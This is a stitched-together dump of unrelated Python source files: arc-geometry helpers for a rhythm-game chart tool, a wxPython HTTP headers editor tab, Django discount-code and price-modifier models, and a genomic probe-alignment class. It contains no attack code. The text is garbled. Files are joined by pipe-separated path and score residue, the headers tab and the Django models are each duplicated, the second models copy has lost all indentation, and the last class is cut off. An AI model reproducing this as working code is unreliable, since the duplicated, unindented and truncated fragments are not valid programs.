def arc_envelope(a1: Arc, a2: Arc, count: int, mode: Literal['c', 'p'] = 'c') -> NoteGroup:
    """Weave two arcs into an "envelope" of `count` straight segments.

    :param a1: first boundary arc; its easing/color/skyline flag are reused.
    :param a2: second boundary arc.
    :param count: number of segments to generate.
    :param mode: 'c' zig-zags between the two arcs (crossing); 'p' connects
        corresponding slices of the two arcs in parallel.
    :raises AffNoteValueError: on an unknown mode.
    """
    class Point:
        # Lightweight (time, x, y) sample of an arc.
        def __init__(self, time, position) -> None:
            self.time: int = time
            self.x: float = position[0]
            self.y: float = position[1]
    arcs: List[Arc] = [a1, a2]
    easing, color, isskyline = a1.slideeasing, a1.color, a1.isskyline
    if mode == 'c':
        # Sample alternating arcs so consecutive points jump between them.
        points: List[Point] = []
        for i in range(count + 1):
            arc = arcs[i % 2]
            step = (arc.totime - arc.time) / count
            current_time = arc.time + step * i
            points.append(Point(current_time, arc[current_time]))
        zipped = [(points[i], points[i + 1]) for i in range(len(points) - 1)]
        return NoteGroup(map(lambda p: Arc(
            p[0].time, p[1].time, p[0].x, p[1].x, easing, p[0].y, p[1].y, color, isskyline
        ), zipped))
    elif mode == 'p':
        zipped = zip(
            arc_slice_by_count(arcs[0], count), arc_slice_by_count(arcs[1], count)
        )
        return NoteGroup(map(lambda p: Arc(
            p[0].time, p[0].totime, p[0].fromx, p[1].tox, easing, p[0].fromy, p[1].toy, color, isskyline
        ), zipped))
    else:
        # Bug fix: error message previously read "Excepting".
        raise AffNoteValueError(f"Expecting 'c' or 'p' for 'mode', not {mode}")
def arc_straighten(arcs: NoteGroup, x: bool = False, y: bool = False, connector: bool = False) -> NoteGroup:
    """Force arcs' end coordinates back to their start coordinates.

    NOTE: mutates the Arc objects in `arcs` in place; the returned group holds
    those same objects (plus optional zero-length connectors).

    :param x: force tox = fromx on every arc.
    :param y: force toy = fromy on every arc.
    :param connector: insert a zero-length 's' arc between consecutive arcs
        whose endpoints no longer line up after straightening.
    :raises AffNoteTypeError: if an element of `arcs` is not an Arc.
    """
    result = NoteGroup([])
    if not (x or y or connector):
        print('Warning: No option used, will return origin NoteGroup')
        return arcs
    for i in range(len(arcs)):
        arc = arcs[i]
        if not isinstance(arc, Arc):
            # Bug fix: error message previously read "Excepting".
            raise AffNoteTypeError(f"Expecting 'Arc', not {type(arc).__name__}")
        if x:
            arc.tox = arc.fromx
        if y:
            arc.toy = arc.fromy
        result.append(arc)
        if connector and (i != len(arcs) - 1):
            next_arc = arcs[i + 1]
            if isinstance(next_arc, Arc) and (next_arc.fromx != arc.tox or next_arc.fromy != arc.toy):
                result.append(Arc(arc.totime, arc.totime, arc.tox, next_arc.fromx, 's', arc.toy, next_arc.fromy, arc.color, arc.isskyline))
    return result
def arc_interlace(arcs: NoteGroup):
    """Toggle the skyline flag of every second arc, in place.

    Processes arcs pairwise (0,1), (2,3), ... and flips `isskyline` on the
    second arc of each pair; a trailing unpaired arc is left untouched.

    :raises AffNoteTypeError: if either arc of a pair is not an Arc.
    :return: the same NoteGroup, mutated.
    """
    # Bug fixes: removed a dead, never-returned `result` group, and the error
    # now names the element that actually failed the type check (the old code
    # always blamed arcs[i], even when arcs[i + 1] was the offender).
    for i in range(0, len(arcs) - 1, 2):
        if isinstance(arcs[i], Arc) and isinstance(arcs[i + 1], Arc):
            arcs[i + 1].isskyline = not arcs[i + 1].isskyline
        else:
            offender = arcs[i] if not isinstance(arcs[i], Arc) else arcs[i + 1]
            raise AffNoteTypeError(f"Expecting 'Arc', not {type(offender).__name__}")
    return arcs
import wx
from kurier.interfaces import IStateRestorable
from kurier.widgets.list_ctrl import EditableListCtrl
class RequestHeadersTab(IStateRestorable, wx.Panel):
    """Notebook tab that lets the user edit HTTP request headers.

    Wraps an ``EditableListCtrl`` with two columns (header name / value) and a
    trailing "utility" row that, when selected, spawns a fresh editable row.
    """
    USED_COLUMNS = ["Header name", "Value"]
    UTILITY_ROW_TEXT = "Click here for adding a new user header..."

    def __init__(self, *args, **kwargs):
        super(RequestHeadersTab, self).__init__(*args, **kwargs)
        self.sizer = wx.BoxSizer(wx.HORIZONTAL)
        self.headers_ctrl = EditableListCtrl(
            self,
            columns=self.USED_COLUMNS,
            utility_row_text=self.UTILITY_ROW_TEXT
        )
        self.InitUI()
        self.BindUI()

    def InitUI(self):
        # Add the utility row first so the list always has its "add" affordance.
        self.AddUtilityRow()
        self.sizer.Add(self.headers_ctrl, proportion=1, flag=wx.EXPAND)
        self.SetSizer(self.sizer)

    def InitFromState(self, **state):
        # IStateRestorable hook: rebuild the rows from a saved headers mapping.
        self.ClearHeadersTab()
        headers = state.get("headers", {})
        for key, value in headers.items():
            self.AddNewHeader(key, value)

    def BindUI(self):
        self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnListItemSelected)

    def ClearHeadersTab(self):
        # Drop and re-add the utility row around the wipe so it survives.
        self.DeleteUtilityRow()
        self.headers_ctrl.DeleteAllItems()
        self.AddUtilityRow()

    def AddUtilityRow(self):
        self.headers_ctrl.AddUtilityRow()

    def DeleteUtilityRow(self):
        self.headers_ctrl.DeleteUtilityRow()

    def AddNewHeader(self, header_name, value=wx.EmptyString):
        # Insert just above the utility row, which is always the last item.
        insert_index = self.headers_ctrl.GetItemCount() - 1
        self.headers_ctrl.AddNewRow(header_name, value, insert_index)

    def OnListItemSelected(self, event):
        event.Skip()
        row_info = event.GetItem()
        # TODO: Add new row and focus on the first column (header name)
        # Selecting the utility (last) row spawns a placeholder 'Key' header.
        if row_info.GetId() == self.headers_ctrl.GetItemCount() - 1:
            self.AddNewHeader('Key')

    def GetHeaders(self):
        """Collect user-entered rows (all but the utility row) into a dict."""
        properties = {}
        rows = self.headers_ctrl.GetItemCount() - 1
        for row in range(rows):
            key = self.headers_ctrl.GetItem(itemIdx=row, col=0).GetText().strip()
            value = self.headers_ctrl.GetItem(itemIdx=row, col=1).GetText()
            properties[key] = value
        # NOTE(review): the trailing "| ..." text below is dataset-extraction
        # residue present in the original dump, not Python code.
        return properties | kurier/widgets/request/headers.py | import wx
from kurier.interfaces import IStateRestorable
from kurier.widgets.list_ctrl import EditableListCtrl
class RequestHeadersTab(IStateRestorable, wx.Panel):
    """Notebook tab that lets the user edit HTTP request headers.

    Wraps an ``EditableListCtrl`` with two columns (header name / value) and a
    trailing "utility" row that, when selected, spawns a fresh editable row.
    """
    USED_COLUMNS = ["Header name", "Value"]
    UTILITY_ROW_TEXT = "Click here for adding a new user header..."

    def __init__(self, *args, **kwargs):
        super(RequestHeadersTab, self).__init__(*args, **kwargs)
        self.sizer = wx.BoxSizer(wx.HORIZONTAL)
        self.headers_ctrl = EditableListCtrl(
            self,
            columns=self.USED_COLUMNS,
            utility_row_text=self.UTILITY_ROW_TEXT
        )
        self.InitUI()
        self.BindUI()

    def InitUI(self):
        # Add the utility row first so the list always has its "add" affordance.
        self.AddUtilityRow()
        self.sizer.Add(self.headers_ctrl, proportion=1, flag=wx.EXPAND)
        self.SetSizer(self.sizer)

    def InitFromState(self, **state):
        # IStateRestorable hook: rebuild the rows from a saved headers mapping.
        self.ClearHeadersTab()
        headers = state.get("headers", {})
        for key, value in headers.items():
            self.AddNewHeader(key, value)

    def BindUI(self):
        self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnListItemSelected)

    def ClearHeadersTab(self):
        # Drop and re-add the utility row around the wipe so it survives.
        self.DeleteUtilityRow()
        self.headers_ctrl.DeleteAllItems()
        self.AddUtilityRow()

    def AddUtilityRow(self):
        self.headers_ctrl.AddUtilityRow()

    def DeleteUtilityRow(self):
        self.headers_ctrl.DeleteUtilityRow()

    def AddNewHeader(self, header_name, value=wx.EmptyString):
        # Insert just above the utility row, which is always the last item.
        insert_index = self.headers_ctrl.GetItemCount() - 1
        self.headers_ctrl.AddNewRow(header_name, value, insert_index)

    def OnListItemSelected(self, event):
        event.Skip()
        row_info = event.GetItem()
        # TODO: Add new row and focus on the first column (header name)
        # Selecting the utility (last) row spawns a placeholder 'Key' header.
        if row_info.GetId() == self.headers_ctrl.GetItemCount() - 1:
            self.AddNewHeader('Key')

    def GetHeaders(self):
        """Collect user-entered rows (all but the utility row) into a dict."""
        properties = {}
        rows = self.headers_ctrl.GetItemCount() - 1
        for row in range(rows):
            key = self.headers_ctrl.GetItem(itemIdx=row, col=0).GetText().strip()
            value = self.headers_ctrl.GetItem(itemIdx=row, col=1).GetText()
            properties[key] = value
        # NOTE(review): the trailing "| ..." text below is dataset-extraction
        # residue present in the original dump, not Python code.
        return properties | 0.289271 | 0.079246
from __future__ import absolute_import, unicode_literals
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models import Count, F, Q
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from parler.managers import TranslatableQuerySet
from parler.models import TranslatableModel, TranslatedFields
from shop.money.fields import MoneyField
from shopit.models.cart import CartDiscountCode
from shopit.models.customer import Customer
from shopit.modifier_conditions import modifier_conditions_pool
from shopit.utils import get_error_message as em
class ModifierQuerySet(TranslatableQuerySet):
    """Queryset helpers for `Modifier`."""

    def active(self):
        """Only modifiers flagged as publicly visible."""
        return self.filter(active=True)

    def filtering_enabled(self):
        """
        Returns queryset with modifiers that are allowed to be used
        when filtering a list of products. This includes modifiers that don't
        have any conditions or discount codes that are required. Also skips
        the 'cart' modifiers.
        """
        qs = self.filter(kind__in=[Modifier.STANDARD, Modifier.DISCOUNT])
        qs = qs.prefetch_related('discount_codes', 'conditions')
        qs = qs.annotate(
            num_discount_codes=Count('discount_codes'),
            num_conditions=Count('conditions'),
        )
        return qs.filter(num_discount_codes=0, num_conditions=0)
@python_2_unicode_compatible
class Modifier(TranslatableModel):
    """A price modifier applied to eligible products or to the whole cart.

    Adds a fixed ``amount`` or a ``percent`` of the price, optionally gated
    behind ``ModifierCondition`` entries and/or ``DiscountCode`` entries.
    """
    # Modifier kinds (see the `kind` field's help text for semantics).
    STANDARD = 'standard'
    DISCOUNT = 'discount'
    CART = 'cart'
    KINDS = (
        (STANDARD, _('Standard')),
        (DISCOUNT, _('Discount')),
        (CART, _('Cart')),
    )
    translations = TranslatedFields(
        name=models.CharField(
            _('Name'),
            max_length=128,
        ),
    )
    code = models.SlugField(
        _('Code'),
        unique=True,
        help_text=_('Unique identifier for this modifier.'),
    )
    amount = MoneyField(
        _('Amount'),
        default=0,
        # NOTE(review): help_text is not wrapped in _() unlike every other
        # field — presumably an oversight; confirm before changing.
        help_text=('Amount that should be added. Can be negative.'),
    )
    percent = models.DecimalField(
        _('Percent'),
        blank=True,
        null=True,
        max_digits=4,
        decimal_places=2,
        help_text=_('Percent that should be added, overrides the amount. Can be negative.'),
    )
    kind = models.CharField(
        _('Kind'),
        max_length=16,
        choices=KINDS,
        default=STANDARD,
        help_text=_(
            'Standard affects the product regardles, Discount checks for a "Discountable" flag on a product and '
            'should be negative, Cart will affect an entire cart.'
        ),
    )
    active = models.BooleanField(
        _('Active'),
        default=True,
        help_text=_('Is this modifier publicly visible.'),
    )
    created_at = models.DateTimeField(
        _('Created at'),
        auto_now_add=True,
    )
    updated_at = models.DateTimeField(
        _('Updated at'),
        auto_now=True,
    )
    order = models.PositiveIntegerField(
        _('Sort'),
        default=0,
    )
    objects = ModifierQuerySet.as_manager()

    class Meta:
        db_table = 'shopit_modifiers'
        verbose_name = _('Modifier')
        verbose_name_plural = _('Modifiers')
        ordering = ['order']

    def __str__(self):
        return self.label

    def save(self, *args, **kwargs):
        # Validate programmatic saves too (Django only runs clean() via forms),
        # so an invalid discount can never be persisted.
        self.clean()
        super(Modifier, self).save(*args, **kwargs)

    @property
    def label(self):
        """Translated name, falling back to any available language."""
        return self.safe_translation_getter('name', any_language=True)

    @property
    def requires_code(self):
        """True if at least one active discount code is attached."""
        return self.discount_codes.active().exists()

    @property
    def is_filtering_enabled(self):
        """True if this modifier qualifies for product-list filtering."""
        return Modifier.objects.filtering_enabled().active().filter(id=self.id).exists()

    def get_conditions(self):
        # Memoized on the instance to avoid re-querying per cart item.
        if not hasattr(self, '_conditions'):
            setattr(self, '_conditions', list(self.conditions.all()))
        return getattr(self, '_conditions')

    def get_discount_codes(self, include_added=False):
        # Memoized per `include_added` flag; see DiscountCodeQuerySet.valid().
        key = '_discount_codes_added' if include_added else '_discount_codes'
        if not hasattr(self, key):
            setattr(self, key, list(self.discount_codes.valid(include_added=include_added)))
        return getattr(self, key)

    def get_added_amount(self, price, quantity=1):
        """Amount this modifier adds; `percent` takes precedence over `amount`.

        NOTE(review): with percent, `quantity` is ignored (price presumably
        already covers the full quantity), while `amount` is per unit —
        confirm with callers.
        """
        return self.percent * price / 100 if self.percent else self.amount * quantity

    def can_be_applied(self, request, cart_item=None, cart=None):
        """
        Returns if a modifier can be applied to the given cart or cart item.
        Either `cart_item` or `cart` must be passed in.
        """
        if cart_item is None and cart is None:
            return False
        if cart_item and not self.is_eligible_product(cart_item.product):
            return False
        for condition in self.get_conditions():
            if not condition.is_met(request, cart_item, cart):
                return False
        if self.requires_code and not self.is_code_applied(cart_item.cart_id if cart_item else cart.id):
            return False
        return self.active  # Should never happen to be False up to this point, but just in case.

    def is_eligible_product(self, product):
        """
        Returns if modifier can be applied to the given product.
        """
        # DISCOUNT modifiers only apply to discountable products; CART
        # modifiers never apply to an individual product.
        if self.kind == self.DISCOUNT:
            return product.discountable
        return self.kind == self.STANDARD

    def is_code_applied(self, cart_id):
        """
        Make sure that at least one code is applied to the given cart.
        """
        cart_codes = CartDiscountCode.objects.filter(cart_id=cart_id).values_list('code', flat=True)
        for code in self.get_discount_codes(include_added=True):
            if code.code in cart_codes:
                return True
        return False

    def clean(self):
        # A discount must decrease the price: whichever of percent/amount is
        # effective (percent overrides amount) has to be negative.
        if self.kind == self.DISCOUNT:
            if self.percent and self.percent >= 0 or not self.percent and self.amount >= 0:
                raise ValidationError(em('discount_not_negative'))

    @classmethod
    def get_cart_modifiers(cls):
        """All cart-kind modifiers (active or not)."""
        return cls.objects.filter(kind=cls.CART)
@python_2_unicode_compatible
class ModifierCondition(models.Model):
    """
    Inline model for Modifier that adds conditions that must be met for
    Modifier to be valid.
    """
    # Choices come from the pluggable condition pool, resolved at import time.
    CONDITIONS = modifier_conditions_pool.get_condition_choices()
    modifier = models.ForeignKey(
        Modifier,
        models.CASCADE,
        related_name='conditions',
        verbose_name=_('Modifier'),
    )
    path = models.CharField(
        _('Condition'),
        max_length=255,
        blank=True,
        choices=CONDITIONS,
    )
    value = models.DecimalField(
        _('Value'),
        blank=True,
        null=True,
        max_digits=10,
        decimal_places=2,
    )
    order = models.PositiveIntegerField(
        _('Sort'),
        default=0,
    )

    class Meta:
        db_table = 'shopit_modifier_conditions'
        verbose_name = _('Condition')
        verbose_name_plural = _('Conditions')
        ordering = ['order']

    def __str__(self):
        # Display name plus the optional numeric value, e.g. "Cart total 10.00".
        name = dict(self.CONDITIONS).get(self.path)
        name = '%s %s' % (name, self.value or '')
        return name.rstrip()

    def save(self, *args, **kwargs):
        # Validate programmatic saves too (Django only runs clean() via forms).
        self.clean()
        super(ModifierCondition, self).save(*args, **kwargs)

    def is_met(self, request, cart_item=None, cart=None):
        """Evaluate the condition against a cart item, else a cart.

        Returns True when the condition cannot be resolved from the pool or
        neither a cart item nor a cart is supplied.
        """
        if self.condition and cart_item:
            return self.condition.cart_item_condition(request, cart_item, self.value)
        if self.condition and cart:
            return self.condition.cart_condition(request, cart, self.value)
        return True

    def clean(self):
        if not self.path:
            raise ValidationError(em('modifier_no_condition_path'))

    @cached_property
    def condition(self):
        # Resolve `path` to a condition object from the pool; presumably
        # returns None if the condition was unregistered — TODO confirm.
        return modifier_conditions_pool.get_condition(self.path)
class DiscountCodeQuerySet(models.QuerySet):
    """Queryset helpers for `DiscountCode`."""

    def active(self):
        return self.filter(active=True)

    def valid(self, include_added=False):
        """
        `include_added` decides if one extra should be added to `max_uses` for
        validating codes already added to cart.
        """
        now = timezone.now()
        started = Q(valid_from__lte=now)
        not_ended = Q(valid_until__isnull=True) | Q(valid_until__gt=now)
        in_window = self.active().filter(started & not_ended)
        unlimited = Q(max_uses__isnull=True)
        if include_added:
            # num_uses == max_uses still validates for an already-applied code.
            return in_window.filter(unlimited | Q(num_uses__lte=F('max_uses')))
        return in_window.filter(unlimited | Q(num_uses__lt=F('max_uses')))
@python_2_unicode_compatible
class DiscountCode(models.Model):
    """
    Discount code model when added to the modifier, it requires it to also
    be added to the cart.
    """
    modifier = models.ForeignKey(
        Modifier,
        models.CASCADE,
        related_name='discount_codes',
        verbose_name=_('Modifier'),
        help_text=_('Modifier that this discount code applies to.'),
    )
    code = models.CharField(
        _('Code'),
        max_length=30,
        unique=True,
        help_text=_('Code that must be entered for the modifier to activate.'),
    )
    customer = models.ForeignKey(
        Customer,
        models.CASCADE,
        blank=True,
        null=True,
        related_name='discount_codes',
        verbose_name=_('Customer'),
        help_text=_('Limit code so that it can be used only by a specific customer.'),
    )
    max_uses = models.PositiveIntegerField(
        _('Max uses'),
        blank=True,
        null=True,
        help_text=_('Number of times this code can be used, leave empty for unlimited usage.'),
    )
    num_uses = models.PositiveIntegerField(
        _('Num uses'),
        default=0,
        help_text=_('Number of times this code has been already used.'),
    )
    active = models.BooleanField(
        _('Active'),
        default=True,
        help_text=_('Is this discount code active.'),
    )
    valid_from = models.DateTimeField(
        _('Valid from'),
        default=timezone.now,
    )
    valid_until = models.DateTimeField(
        _('Valid until'),
        blank=True,
        null=True,
    )
    order = models.PositiveIntegerField(
        _('Sort'),
        default=0,
    )
    objects = DiscountCodeQuerySet.as_manager()

    class Meta:
        db_table = 'shopit_discount_codes'
        verbose_name = _('Discount code')
        verbose_name_plural = _('Discount codes')
        ordering = ['order']

    def __str__(self):
        return self.code

    @property
    def is_valid(self):
        """Per-instance mirror of DiscountCodeQuerySet.valid() (strict variant)."""
        now = timezone.now()
        if not self.active:
            return False
        if self.max_uses is not None and self.num_uses >= self.max_uses:
            return False
        if self.valid_until:
            return self.valid_from <= now and self.valid_until > now
        return self.valid_from <= now

    def use(self, times=1):
        """
        Should be called when code is used to update `num_uses` field.
        """
        # NOTE(review): read-modify-write here is racy under concurrent
        # checkouts; an F('num_uses') + times update would be atomic — confirm.
        self.num_uses = self.num_uses + times
        # NOTE(review): the trailing "| ..." text below is dataset-extraction
        # residue present in the original dump, not Python code.
        self.save(update_fields=['num_uses']) | shopit/models/modifier.py
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models import Count, F, Q
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from parler.managers import TranslatableQuerySet
from parler.models import TranslatableModel, TranslatedFields
from shop.money.fields import MoneyField
from shopit.models.cart import CartDiscountCode
from shopit.models.customer import Customer
from shopit.modifier_conditions import modifier_conditions_pool
from shopit.utils import get_error_message as em
class ModifierQuerySet(TranslatableQuerySet):
    """Queryset helpers for `Modifier`."""

    def active(self):
        """Only modifiers flagged as publicly visible."""
        return self.filter(active=True)

    def filtering_enabled(self):
        """
        Returns queryset with modifiers that are allowed to be used
        when filtering a list of products. This includes modifiers that don't
        have any conditions or discount codes that are required. Also skips
        the 'cart' modifiers.
        """
        qs = self.filter(kind__in=[Modifier.STANDARD, Modifier.DISCOUNT])
        qs = qs.prefetch_related('discount_codes', 'conditions')
        qs = qs.annotate(
            num_discount_codes=Count('discount_codes'),
            num_conditions=Count('conditions'),
        )
        return qs.filter(num_discount_codes=0, num_conditions=0)
@python_2_unicode_compatible
class Modifier(TranslatableModel):
STANDARD = 'standard'
DISCOUNT = 'discount'
CART = 'cart'
KINDS = (
(STANDARD, _('Standard')),
(DISCOUNT, _('Discount')),
(CART, _('Cart')),
)
translations = TranslatedFields(
name=models.CharField(
_('Name'),
max_length=128,
),
)
code = models.SlugField(
_('Code'),
unique=True,
help_text=_('Unique identifier for this modifier.'),
)
amount = MoneyField(
_('Amount'),
default=0,
help_text=('Amount that should be added. Can be negative.'),
)
percent = models.DecimalField(
_('Percent'),
blank=True,
null=True,
max_digits=4,
decimal_places=2,
help_text=_('Percent that should be added, overrides the amount. Can be negative.'),
)
kind = models.CharField(
_('Kind'),
max_length=16,
choices=KINDS,
default=STANDARD,
help_text=_(
'Standard affects the product regardles, Discount checks for a "Discountable" flag on a product and '
'should be negative, Cart will affect an entire cart.'
),
)
active = models.BooleanField(
_('Active'),
default=True,
help_text=_('Is this modifier publicly visible.'),
)
created_at = models.DateTimeField(
_('Created at'),
auto_now_add=True,
)
updated_at = models.DateTimeField(
_('Updated at'),
auto_now=True,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
objects = ModifierQuerySet.as_manager()
class Meta:
db_table = 'shopit_modifiers'
verbose_name = _('Modifier')
verbose_name_plural = _('Modifiers')
ordering = ['order']
def __str__(self):
return self.label
def save(self, *args, **kwargs):
self.clean()
super(Modifier, self).save(*args, **kwargs)
@property
def label(self):
return self.safe_translation_getter('name', any_language=True)
@property
def requires_code(self):
return self.discount_codes.active().exists()
@property
def is_filtering_enabled(self):
return Modifier.objects.filtering_enabled().active().filter(id=self.id).exists()
def get_conditions(self):
if not hasattr(self, '_conditions'):
setattr(self, '_conditions', list(self.conditions.all()))
return getattr(self, '_conditions')
def get_discount_codes(self, include_added=False):
key = '_discount_codes_added' if include_added else '_discount_codes'
if not hasattr(self, key):
setattr(self, key, list(self.discount_codes.valid(include_added=include_added)))
return getattr(self, key)
def get_added_amount(self, price, quantity=1):
return self.percent * price / 100 if self.percent else self.amount * quantity
def can_be_applied(self, request, cart_item=None, cart=None):
"""
Returns if a modifier can be applied to the given cart or cart item.
Either `cart_item` or `cart` must be passed in.
"""
if cart_item is None and cart is None:
return False
if cart_item and not self.is_eligible_product(cart_item.product):
return False
for condition in self.get_conditions():
if not condition.is_met(request, cart_item, cart):
return False
if self.requires_code and not self.is_code_applied(cart_item.cart_id if cart_item else cart.id):
return False
return self.active # Should never happen to be False up to this point, but just in case.
def is_eligible_product(self, product):
"""
Returns if modifier can be applied to the given product.
"""
if self.kind == self.DISCOUNT:
return product.discountable
return self.kind == self.STANDARD
def is_code_applied(self, cart_id):
"""
Make sure that at least one code is applied to the given cart.
"""
cart_codes = CartDiscountCode.objects.filter(cart_id=cart_id).values_list('code', flat=True)
for code in self.get_discount_codes(include_added=True):
if code.code in cart_codes:
return True
return False
def clean(self):
if self.kind == self.DISCOUNT:
if self.percent and self.percent >= 0 or not self.percent and self.amount >= 0:
raise ValidationError(em('discount_not_negative'))
@classmethod
def get_cart_modifiers(cls):
return cls.objects.filter(kind=cls.CART)
@python_2_unicode_compatible
class ModifierCondition(models.Model):
"""
Inline model for Modifier that adds conditions that must be met for
Modifier to be valid.
"""
CONDITIONS = modifier_conditions_pool.get_condition_choices()
modifier = models.ForeignKey(
Modifier,
models.CASCADE,
related_name='conditions',
verbose_name=_('Modifier'),
)
path = models.CharField(
_('Condition'),
max_length=255,
blank=True,
choices=CONDITIONS,
)
value = models.DecimalField(
_('Value'),
blank=True,
null=True,
max_digits=10,
decimal_places=2,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
class Meta:
db_table = 'shopit_modifier_conditions'
verbose_name = _('Condition')
verbose_name_plural = _('Conditions')
ordering = ['order']
def __str__(self):
name = dict(self.CONDITIONS).get(self.path)
name = '%s %s' % (name, self.value or '')
return name.rstrip()
def save(self, *args, **kwargs):
self.clean()
super(ModifierCondition, self).save(*args, **kwargs)
def is_met(self, request, cart_item=None, cart=None):
if self.condition and cart_item:
return self.condition.cart_item_condition(request, cart_item, self.value)
if self.condition and cart:
return self.condition.cart_condition(request, cart, self.value)
return True
def clean(self):
if not self.path:
raise ValidationError(em('modifier_no_condition_path'))
@cached_property
def condition(self):
return modifier_conditions_pool.get_condition(self.path)
class DiscountCodeQuerySet(models.QuerySet):
def active(self):
return self.filter(active=True)
def valid(self, include_added=False):
"""
`include_added` decides if one extra should be added to `max_uses` for
validating codes already added to cart.
"""
now = timezone.now()
qs = self.active().filter(Q(valid_from__lte=now) & (Q(valid_until__isnull=True) | Q(valid_until__gt=now)))
if include_added:
return qs.filter(Q(max_uses__isnull=True) | Q(num_uses__lte=F('max_uses')))
return qs.filter(Q(max_uses__isnull=True) | Q(num_uses__lt=F('max_uses')))
@python_2_unicode_compatible
class DiscountCode(models.Model):
"""
Discount code model when added to the modifier, it requires it to also
be added to the cart.
"""
modifier = models.ForeignKey(
Modifier,
models.CASCADE,
related_name='discount_codes',
verbose_name=_('Modifier'),
help_text=_('Modifier that this discount code applies to.'),
)
code = models.CharField(
_('Code'),
max_length=30,
unique=True,
help_text=_('Code that must be entered for the modifier to activate.'),
)
customer = models.ForeignKey(
Customer,
models.CASCADE,
blank=True,
null=True,
related_name='discount_codes',
verbose_name=_('Customer'),
help_text=_('Limit code so that it can be used only by a specific customer.'),
)
max_uses = models.PositiveIntegerField(
_('Max uses'),
blank=True,
null=True,
help_text=_('Number of times this code can be used, leave empty for unlimited usage.'),
)
num_uses = models.PositiveIntegerField(
_('Num uses'),
default=0,
help_text=_('Number of times this code has been already used.'),
)
active = models.BooleanField(
_('Active'),
default=True,
help_text=_('Is this discount code active.'),
)
valid_from = models.DateTimeField(
_('Valid from'),
default=timezone.now,
)
valid_until = models.DateTimeField(
_('Valid until'),
blank=True,
null=True,
)
order = models.PositiveIntegerField(
_('Sort'),
default=0,
)
objects = DiscountCodeQuerySet.as_manager()
class Meta:
db_table = 'shopit_discount_codes'
verbose_name = _('Discount code')
verbose_name_plural = _('Discount codes')
ordering = ['order']
def __str__(self):
return self.code
@property
def is_valid(self):
now = timezone.now()
if not self.active:
return False
if self.max_uses is not None and self.num_uses >= self.max_uses:
return False
if self.valid_until:
return self.valid_from <= now and self.valid_until > now
return self.valid_from <= now
def use(self, times=1):
"""
Should be called when code is used to update `num_uses` field.
"""
self.num_uses = self.num_uses + times
self.save(update_fields=['num_uses']) | 0.783575 | 0.143698 |
import pyfastaq
from varifier import edit_distance
class Probe:
def __init__(self, seq, allele_start, allele_end):
self.seq = seq
self.allele_start = allele_start
self.allele_end = allele_end
def __str__(self):
return f"{self.seq} {self.allele_start} {self.allele_end}"
def __eq__(self, other):
return type(other) is type(self) and self.__dict__ == other.__dict__
def allele_seq(self):
return self.seq[self.allele_start : self.allele_end + 1]
def map_hit_includes_allele(self, map_hit):
if map_hit.strand == -1:
start = len(self.seq) - map_hit.q_en
end = len(self.seq) - map_hit.q_st
else:
start = map_hit.q_st
end = map_hit.q_en
return start < self.allele_start and self.allele_end < end
def allele_match_counts(self, map_hit):
"""Given a mappy minimap2 hit, works out how many positions in the
alignment between the allele and the reference match.
Returns a tuple: (matching bases, total positions).
The minimap2 hit must have the extended cigar string, not the 'normal'
cigar string."""
if map_hit.NM == 0:
l = self.allele_end - self.allele_start + 1
return l, l
# If there are mismatches, then we can use the extended cigar string to
# work out how many of those mismatches are in the allele.
# Example cigar to remind which way round I and D are:
# read: AGT--TGATCAAGTAC
# ref: AGTGATGATC----AC
# cigar: 3M2D5M4I2M
probe_pos = map_hit.q_st
total_positions = 0
matches = 0
if map_hit.strand == -1:
map_hit.cigar.reverse()
for length, operator in map_hit.cigar:
if probe_pos > self.allele_end:
break
if operator == 7 or operator == 8: # 7,8 are "=","X" == match/mismatch
for i in range(length):
if self.allele_start <= probe_pos <= self.allele_end:
if operator == 7:
matches += 1
total_positions += 1
probe_pos += 1
if probe_pos > self.allele_end:
break
elif operator == 1: # 1 = I = insertion
if self.allele_start <= probe_pos <= self.allele_end:
total_positions += length
probe_pos += length
elif operator == 2: # 2 = D = deletion
if self.allele_start <= probe_pos <= self.allele_end:
total_positions += length
else:
raise RuntimeError(
f"Unexpected cigar operator number {operator} with length {length} from cigar"
)
if map_hit.strand == -1:
map_hit.cigar.reverse()
return matches, total_positions
def padded_probe_or_ref_seq(self, map_hit, ref_seq=None, ref_mask=None):
"""Returns a tuple: (padded seq string, mask list of bools).
padded seq string is the padded probe seq inferred from map_hit, or
if ref_seq provided then the padded ref seq matching the probe.
If ref_mask is given, should be a set of positions in the mask.
The returned mask list of bools is same length as the returned padded
seq string, and has True or False for whether each position is in the mask"""
# Cigar operators:
# 1 I Insertion in query (pad in ref)
# 2 D Deletion in query (pad in query)
# 7 = Match
# 8 X Mismatch
if map_hit.strand == -1:
q_st = len(self.seq) - map_hit.q_en
else:
q_st = map_hit.q_st
padded_seq = []
padded_mask = []
if ref_seq is None:
assert ref_mask is None
ref_seq = self.seq
pad_operators = {2}
non_pad_operators = {1, 7, 8}
if map_hit.strand == -1:
ref_seq = pyfastaq.sequences.Fasta("probe", self.seq)
ref_seq.revcomp()
position = q_st
else:
pad_operators = {1}
non_pad_operators = {2, 7, 8}
position = map_hit.r_st
for operator_length, operator_type in map_hit.cigar:
if operator_type in pad_operators:
padded_seq.append("-" * operator_length)
if ref_mask is not None:
padded_mask.extend([False] * operator_length)
elif operator_type in non_pad_operators:
padded_seq.append(ref_seq[position : position + operator_length])
if ref_mask is not None:
for i in range(position, position + operator_length):
padded_mask.append(i in ref_mask)
position += operator_length
else:
raise RuntimeError(
f"Unexpected cigar operator number {operator_type} with length {operator_length} from cigar"
)
if map_hit.strand == -1:
padded_seq.extend(["N"] * map_hit.q_st)
padded_seq = pyfastaq.sequences.Fasta("seq", "".join(padded_seq))
padded_seq.revcomp()
padded_seq = padded_seq.seq
if ref_mask is not None:
padded_mask.extend([False] * map_hit.q_st)
padded_mask.reverse()
else:
padded_seq = "".join(["N"] * map_hit.q_st + padded_seq)
if ref_mask is not None:
padded_mask = [False] * map_hit.q_st + padded_mask
if ref_mask is None:
padded_mask = [False] * len(padded_seq)
assert len(padded_seq) == len(padded_mask)
